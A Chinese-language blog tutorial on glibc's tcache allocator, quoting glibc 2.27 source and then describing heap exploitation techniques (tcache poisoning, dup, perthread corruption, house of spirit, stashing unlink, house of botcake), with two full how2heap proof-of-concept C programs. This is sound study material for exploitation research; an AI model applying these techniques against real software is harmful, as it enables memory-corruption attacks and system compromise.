How2Heap(8)——Tcache

pwn heap

 2024/07/28 

什么是tcache？

就是glibc2.26之后为了再提速，在fastbin上面又加入了一个cache机制叫tcache。每个thread由一个结构体tcache_perthred_struct管理，里面是两个数组，一个管理每条链上的tcache数目，另一个用单向链表连接起chunk，就用一个指针（这个指针直接指向user data）。每条链上最多连7个，并且和fastbin一样也不会重置prev_inuse位，不合并。

总的来说，tcache的思想类似于cpu的cache的感觉但是更加简化（比如没有淘汰替换算法），优先级最高，他还会主动将chunk从其他bin中往自己的链上装。

申请内存上的改动

tcache的优先级很高，从tcache中取chunk的步骤发生在__libc_malloc()中而不是_int_malloc，这意味着如果这个cache起作用了能节省相当大的一部分时间（会在libc_malloc就返回根本不会调用_int_malloc）。tcache遵循后进先出的LIFO原则。

在第一次调用malloc的时候__libc_malloc会初始化tcache。然后如果能取就从tcache中取chunk返回。

下面的源码取自glibc2.27的__libc_malloc

#if USE_TCACHE
  /* int_free also calls request2size, be careful to not pad twice.  */
  size_t tbytes;
  checked_request2size (bytes, tbytes);
  size_t tc_idx = csize2tidx (tbytes);

  MAYBE_INIT_TCACHE ();

  DIAG_PUSH_NEEDS_COMMENT;
  if (tc_idx < mp_.tcache_bins
      /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
      && tcache
      && tcache->entries[tc_idx] != NULL)
    {
      return tcache_get (tc_idx);
    }
  DIAG_POP_NEEDS_COMMENT;
#endif

释放上的改动

free也是优先放入tcache，下面是_int_free中开头的一段代码，可以看到如果还能放下（检查idx和数量）就直接放入tcache并返回。

#if USE_TCACHE
  {
    size_t tc_idx = csize2tidx (size);

    if (tcache
	&& tc_idx < mp_.tcache_bins
	&& tcache->counts[tc_idx] < mp_.tcache_count)
      {
	tcache_put (p, tc_idx);
	return;
      }
  }
#endif

cache的装入策略

在_int_malloc中，每个size的处理分支都加了一段tcache的代码，fastbin的if分支内添加了如下一段：

if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
...
#if USE_TCACHE
	      /* While we're here, if we see other chunks of the same size,
		 stash them in the tcache.  */
	      size_t tc_idx = csize2tidx (nb);
	      if (tcache && tc_idx < mp_.tcache_bins)
		{
		  mchunkptr tc_victim;
		  /* While bin not empty and tcache not full, copy chunks.  */
		  while (tcache->counts[tc_idx] < mp_.tcache_count
			 && (tc_victim = *fb) != NULL)
		    {
		      if (SINGLE_THREAD_P)
			*fb = tc_victim->fd;
		      else
			{
			  REMOVE_FB (fb, pp, tc_victim);
			  if (__glibc_unlikely (tc_victim == NULL))
			    break;
			}
		      tcache_put (tc_victim, tc_idx);
		    }
		}
#endif
...

在small bin的分支则是这样一段（大差不差）

#if USE_TCACHE
	  /* While we're here, if we see other chunks of the same size,
	     stash them in the tcache.  */
	  size_t tc_idx = csize2tidx (nb);
	  if (tcache && tc_idx < mp_.tcache_bins)
	    {
	      mchunkptr tc_victim;
	      /* While bin not empty and tcache not full, copy chunks over.  */
	      while (tcache->counts[tc_idx] < mp_.tcache_count
		     && (tc_victim = last (bin)) != bin)
		{
		  if (tc_victim != 0)
		    {
		      bck = tc_victim->bk;
		      set_inuse_bit_at_offset (tc_victim, nb);
		      if (av != &main_arena)
			set_non_main_arena (tc_victim);
		      bin->bk = bck;
		      bck->fd = bin;
		      tcache_put (tc_victim, tc_idx);
	            }
		}
	    }
#endif

在后续大循环处理unsorted bin的时候，没有tcache的情况下，发现exact fit会直接返回，但有tcache的话会先装进cache然后继续遍历，装满或者遍历结束再返回，chunk会等会返回。

          if (size == nb)
            {
              set_inuse_bit_at_offset (victim, size);
              if (av != &main_arena)
		set_non_main_arena (victim);
#if USE_TCACHE
	      /* Fill cache first, return to user only if cache fills.
		 We may return one of these chunks later.  */
	      if (tcache_nb
		  && tcache->counts[tc_idx] < mp_.tcache_count)
		{
		  tcache_put (victim, tc_idx);
		  return_cached = 1;//这个标记启用了说明tcache中有恰好满足要求的chunk，等下用这个判断
		  continue;
		}
	      else
		{
#endif
              check_malloced_chunk (av, victim, nb);
              void *p = chunk2mem (victim);
              alloc_perturb (p, bytes);
              return p;
#if USE_TCACHE
		}
#endif
            }

在往tcache中装chunk的时候维护了一个计数器tcache_unsorted_count，循环末尾如果这个数已经足够大了并且tcache中有我们需要的chunk就从tcache中返回。同时如果遍历结束了（在循环外）并且return_cached被置位那么也从tcache返回，代码略，就是一句话。

#if USE_TCACHE
      /* If we've processed as many chunks as we're allowed while
	 filling the cache, return one of the cached ones.  */
      ++tcache_unsorted_count;
      if (return_cached
	  && mp_.tcache_unsorted_limit > 0
	  && tcache_unsorted_count > mp_.tcache_unsorted_limit)
	{
	  return tcache_get (tc_idx);
	}
#endif

largebin的处理中不涉及tcache。

tcache_get和tcache_put

tcache操作的核心就是最简单的两个函数：tcache_get（取）和tcache_put（存）

核心取的函数在tcache_get上，然而这个函数简单的不能再简单（为了速度，而且是永远内联）：

/* Caller must ensure that we know tc_idx is valid and there's
   available chunks to remove.  */
static __always_inline void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  return (void *) e;
}

就是从链表头取一个然后count-1。保护就是两个断言，分别检查了idx是不是比最大数量小，然后对应链的tcache是否为空，没有指针检查。

tcache_put也是一样，就是直接一个单向链表插入然后计数+1

static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);//这是因为tcache指针直接指向user data
  assert (tc_idx < TCACHE_MAX_BINS);
  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

这里也能看出，插入永远插入链表头，取也是优先从头取，说明tcache是LIFO结构。

怎么攻击？

简单覆盖tcache_poisoning

和fastbin的思想一样，直接覆盖fd（next）指针，malloc同样大小两次就行。而且没有size检查随便写。

tcache dup

类似fastbin dup。不过这次连开头的double free检查都没了，直接double free就行。

tcache perthread corruption

利用任意地址分配或者类似的技术直接劫持tcache_perthread_struct结构体（这个结构体也在堆上，可能部分写就可以），然后后续的small分配就全可控了。

tcache house of spirit

这位更是这位，直接放poc吧挺难绷的。就fakechunk写个size然后指针指user data直接free就行了。

#include <stdio.h>
#include <stdlib.h>

int main()
{
    fprintf(stderr, "This file demonstrates the house of spirit attack on tcache.\n");
    fprintf(stderr, "It works in a similar way to original house of spirit but you don't need to create fake chunk after the fake chunk that will be freed.\n");
    fprintf(stderr, "You can see this in malloc.c in function _int_free that tcache_put is called without checking if next chunk's size and prev_inuse are sane.\n");
    fprintf(stderr, "(Search for strings \"invalid next size\" and \"double free or corruption\")\n\n");
    fprintf(stderr, "Ok. Let's start with the example!.\n\n");

    fprintf(stderr, "Calling malloc() once so that it sets up its memory.\n");
    malloc(1);

    fprintf(stderr, "Let's imagine we will overwrite 1 pointer to point to a fake chunk region.\n");
    unsigned long long *a; //pointer that will be overwritten
    unsigned long long fake_chunks[10]; //fake chunk region

    fprintf(stderr, "This region contains one fake chunk. It's size field is placed at %p\n", &fake_chunks[1]);

    fprintf(stderr, "This chunk size has to be falling into the tcache category (chunk.size <= 0x410; malloc arg <= 0x408 on x64). The PREV_INUSE (lsb) bit is ignored by free for tcache chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
    fprintf(stderr, "... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");
    fake_chunks[1] = 0x40; // this is the size


    fprintf(stderr, "Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);
    fprintf(stderr, "... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");

    a = &fake_chunks[2];

    fprintf(stderr, "Freeing the overwritten pointer.\n");
    free(a);

    fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]);
    fprintf(stderr, "malloc(0x30): %p\n", malloc(0x30));
}

tcache stashing unlink attack（new）

这是利用了在_int_malloc中，如果tcache非空且有剩余（可用calloc触发，calloc不从tcache中选取），会将扫描到的smallbin放入tcache中。而这次连接只检查了第一个bin的完整性。这个攻击可以实现类似于unsorted bin attack的效果，将一个libc地址写入任意地址。如果构造好的话也能任意地址fake chunk分配。

 /* While we're here, if we see other chunks of the same size,
    stash them in the tcache.  */
 size_t tc_idx = csize2tidx (nb);
 if (tcache && tc_idx < mp_.tcache_bins)
   {
     mchunkptr tc_victim;

     /* While bin not empty and tcache not full, copy chunks over.  */
     while (tcache->counts[tc_idx] < mp_.tcache_count
     && (tc_victim = last (bin)) != bin)
{
  if (tc_victim != 0)
    {
      bck = tc_victim->bk;
      set_inuse_bit_at_offset (tc_victim, nb);
      if (av != &main_arena)
	set_non_main_arena (tc_victim);
      bin->bk = bck;
      bck->fd = bin;// attack

      tcache_put (tc_victim, tc_idx);
           }
}
   }

以how2heap的poc为例：

int main(){
    unsigned long stack_var[0x10] = {0};
    unsigned long *chunk_lis[0x10] = {0};
    unsigned long *target;

    fprintf(stderr, "This file demonstrates the stashing unlink attack on tcache.\n\n");
    fprintf(stderr, "This poc has been tested on both glibc 2.27 and glibc 2.29.\n\n");
    fprintf(stderr, "This technique can be used when you are able to overwrite the victim->bk pointer. Besides, it's necessary to alloc a chunk with calloc at least once. Last not least, we need a writable address to bypass check in glibc\n\n");
    fprintf(stderr, "The mechanism of putting smallbin into tcache in glibc gives us a chance to launch the attack.\n\n");
    fprintf(stderr, "This technique allows us to write a libc addr to wherever we want and create a fake chunk wherever we need. In this case we'll create the chunk on the stack.\n\n");
    // stack_var emulate the fake_chunk we want to alloc to
    fprintf(stderr, "Stack_var emulates the fake chunk we want to alloc to.\n\n");
    fprintf(stderr, "First let's write a writeable address to fake_chunk->bk to bypass bck->fd = bin in glibc. Here we choose the address of stack_var[2] as the fake bk. Later we can see *(fake_chunk->bk + 0x10) which is stack_var[4] will be a libc addr after attack.\n\n");

    stack_var[3] = (unsigned long)(&stack_var[2]);

    fprintf(stderr, "You can see the value of fake_chunk->bk is:%p\n\n",(void*)stack_var[3]);
    fprintf(stderr, "Also, let's see the initial value of stack_var[4]:%p\n\n",(void*)stack_var[4]);
    fprintf(stderr, "Now we alloc 9 chunks with malloc.\n\n");

    //now we malloc 9 chunks
    for(int i = 0;i < 9;i++){
        chunk_lis[i] = (unsigned long*)malloc(0x90);
    }

    //put 7 tcache
    fprintf(stderr, "Then we free 7 of them in order to put them into tcache. Carefully we didn't free a serial of chunks like chunk2 to chunk9, because an unsorted bin next to another will be merged into one after another malloc.\n\n");

    for(int i = 3;i < 9;i++){
        free(chunk_lis[i]);
    }

    fprintf(stderr, "As you can see, chunk1 & [chunk3,chunk8] are put into tcache bins while chunk0 and chunk2 will be put into unsorted bin.\n\n");

    //last tcache bin
    free(chunk_lis[1]);
    //now they are put into unsorted bin
    free(chunk_lis[0]);
    free(chunk_lis[2]); // 分隔开防止合并

    //convert into small bin
    fprintf(stderr, "Now we alloc a chunk larger than 0x90 to put chunk0 and chunk2 into small bin.\n\n");

    malloc(0xa0);//>0x90

    //now 5 tcache bins
    fprintf(stderr, "Then we malloc two chunks to spare space for small bins. After that, we now have 5 tcache bins and 2 small bins\n\n");

    malloc(0x90);
    malloc(0x90);

    fprintf(stderr, "Now we emulate a vulnerability that can overwrite the victim->bk pointer into fake_chunk addr: %p.\n\n",(void*)stack_var);

    //change victim->bck
    /*VULNERABILITY*/
    chunk_lis[2][1] = (unsigned long)stack_var;
    /*VULNERABILITY*/

    //trigger the attack
    fprintf(stderr, "Finally we alloc a 0x90 chunk with calloc to trigger the attack. The small bin preiously freed will be returned to user, the other one and the fake_chunk were linked into tcache bins.\n\n");

    calloc(1,0x90);//返回chunk[0]

    fprintf(stderr, "Now our fake chunk has been put into tcache bin[0xa0] list. Its fd pointer now point to next free chunk: %p and the bck->fd has been changed into a libc addr: %p\n\n",(void*)stack_var[2],(void*)stack_var[4]);

    //malloc and return our fake chunk on stack
    target = malloc(0x90);   

    fprintf(stderr, "As you can see, next malloc(0x90) will return the region our fake chunk: %p\n",(void*)target);
    return 0;
}

首先经过堆排布获得5个链好的tcache（2个空位）和两个不会合并的small bin chunk。然后模拟UAF篡改2的bk到我们想要的fake_chunk，这个fake_chunk的bk域写了另一个可写地址target。
最后通过calloc触发攻击。调用calloc的时候_int_malloc将smallbin中的chunk0和2放入tcache，在这个过程中，上面bck->fd=bin的这一行代码会导致我们target+0x10的位置被写入一个libc地址。此时calloc返回先释放的块，chunk2被放在了tcache头。由于LIFO原则，下次malloc会返回2，也就拿到了fake_chunk.

可能是因为只有放进tcache后才能不检查size不检查指针的拿出来smallbin吧。另外在有tcache的情况下也可能这种攻击比unsortedbin更容易。

House of botcake

tcache double free实现任意堆块分配。

用0x110的堆块填满tcache，然后再释放两个相邻的0x110堆块（先a后b）放入unsorted bin并导致合并
取出一个0x110的chunk（从tcache），然后再次释放上一步中的a块，a块此时被放入tcache，这里形成了一个重叠
分配一个0x130的堆块，这会从unsorted bin中合并好的块切割，而这时候我们取得的这个chunk可以拿来修改tcache头部的a块
修改fd后malloc两次即可

leak

2.26版本之后，free的堆块会先进入tcache而不是unsorted bin，而tcache_perthread_struct在堆上不在libc数据段，因此需要先将tcache填满后再free+读才能泄露地址。或者操作超过tcache处理范围的堆块（64位下0x290应该是）。

Next Post

Kernel Pwn从入门到入土-1
Previous Post

How2Heap(7)——Large Bin Attack

CATALOG

1. 什么是tcache？
2. 怎么攻击？